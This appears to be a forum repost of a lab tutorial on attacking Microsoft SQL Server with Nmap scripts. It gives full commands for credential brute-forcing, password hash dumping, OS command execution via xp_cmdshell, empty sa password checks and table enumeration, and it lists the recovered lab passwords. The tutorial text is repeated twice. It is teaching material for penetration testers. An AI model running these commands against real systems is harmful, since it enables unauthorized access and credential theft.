yardenweinn
Sandbox Explorer
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
To obtain basic information such as database names, usernames, names of tables, etc from the SQL servers on the Windows operating system, we will execute penetration testing using Nmap scripts. MSSQL is Microsoft SQL Server for database management in the network. By default, it runs on port 1433. In our previousarticle, we had set up a Microsoft SQL Server in Windows 10.
Table of Content
Requirement
Attacker: Kali Linux (NMAP)
Target: Windows 10 (MS SQL Server)
Nmap is a collection of Lua-based NSE scripts that conduct authentication and unauthenticated penetration testing on MS-SQL port 1433. The NSE script for MS-SQL may be identified using the instructions below.
Enumerating version
This Script will attempt to determine configuration and version information for Microsoft SQL Server instances.
Credential Brute Force
Performs brute-force password auditing against Ms-SQL servers and connection timeout (default: “5s”). All we need are dictionaries for usernames and passwords, which will be passed as arguments.
In the image you can observe that we had successfully retrieve credentials for three users:
Execute SQL Query
Once you have retrieved the login credential use these credentials in the NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL Server.
Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.
NetBIOS Enumeration
Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.
Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with an NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.
MS-SQL Password Hash Dump
The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. To do so, the user needs to have the appropriate DB privileges.
From the given image you can observe that it has dumped the hash value of passwords of the user: sa which we have enumerated above.
Command Excecution
The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. By default, the xp_cmdshell option is disabled. NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in the targeted server
From the depicted image you can perceive the output for the “net user” command.
Test Empty Password Login
If the administrator of Microsoft-SQL Server left the password blank for login, the attacker can direct login into the database server; as shown in the image below, we are investigating the property of a user’s account “sa.”
Following NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
We had successfully logged in with user: sa and an empty password, as you can see in the screenshot below.
Enumerate Database Tables
The following command will attempt to fetch a list of tables from inside the Microsoft SQL server bypassing login credentials as an argument through Nmap script.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Table of Content
- Requirement
- Enumerating version
- Credential Brute Force
- Execute SQL Query
- NetBIOS Enumeration
- MS-SQL Password Hash Dump
- Command Execution
- Test Empty Password Login
- Enumerate Database Tables
Requirement
Attacker: Kali Linux (NMAP)
Target: Windows 10 (MS SQL Server)
Nmap is a collection of Lua-based NSE scripts that conduct authentication and unauthenticated penetration testing on MS-SQL port 1433. The NSE script for MS-SQL may be identified using the instructions below.
Code:
locate *.nse | grep ms-sqlEnumerating version
This Script will attempt to determine configuration and version information for Microsoft SQL Server instances.
Code:
nmap -p 1433 --script ms-sql-info 192.168.1.146Credential Brute Force
Performs brute-force password auditing against Ms-SQL servers and connection timeout (default: “5s”). All we need are dictionaries for usernames and passwords, which will be passed as arguments.
Code:
nmap -p1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.146In the image you can observe that we had successfully retrieve credentials for three users:
Code:
Username: pavan and password:Password@123
Username: aarti and password:Password@123
Username: sa and password: Password@1Execute SQL Query
Once you have retrieved the login credential use these credentials in the NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL Server.
Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.
Code:
nmap -p1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-query.query="sp_databases" 192.168.1.146NetBIOS Enumeration
Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.
Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with an NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.
Code:
nmap -p1433 --script ms-sql-ntlm-info 192.168.1.146MS-SQL Password Hash Dump
The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. To do so, the user needs to have the appropriate DB privileges.
Code:
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146From the given image you can observe that it has dumped the hash value of passwords of the user: sa which we have enumerated above.
Command Excecution
The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. By default, the xp_cmdshell option is disabled. NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in the targeted server
Code:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.146From the depicted image you can perceive the output for the “net user” command.
Test Empty Password Login
If the administrator of Microsoft-SQL Server left the password blank for login, the attacker can direct login into the database server; as shown in the image below, we are investigating the property of a user’s account “sa.”
Following NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
Code:
nmap -p1433 --script ms-sql-empty-password 192.168.1.146We had successfully logged in with user: sa and an empty password, as you can see in the screenshot below.
Enumerate Database Tables
The following command will attempt to fetch a list of tables from inside the Microsoft SQL server bypassing login credentials as an argument through Nmap script.
Code:
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here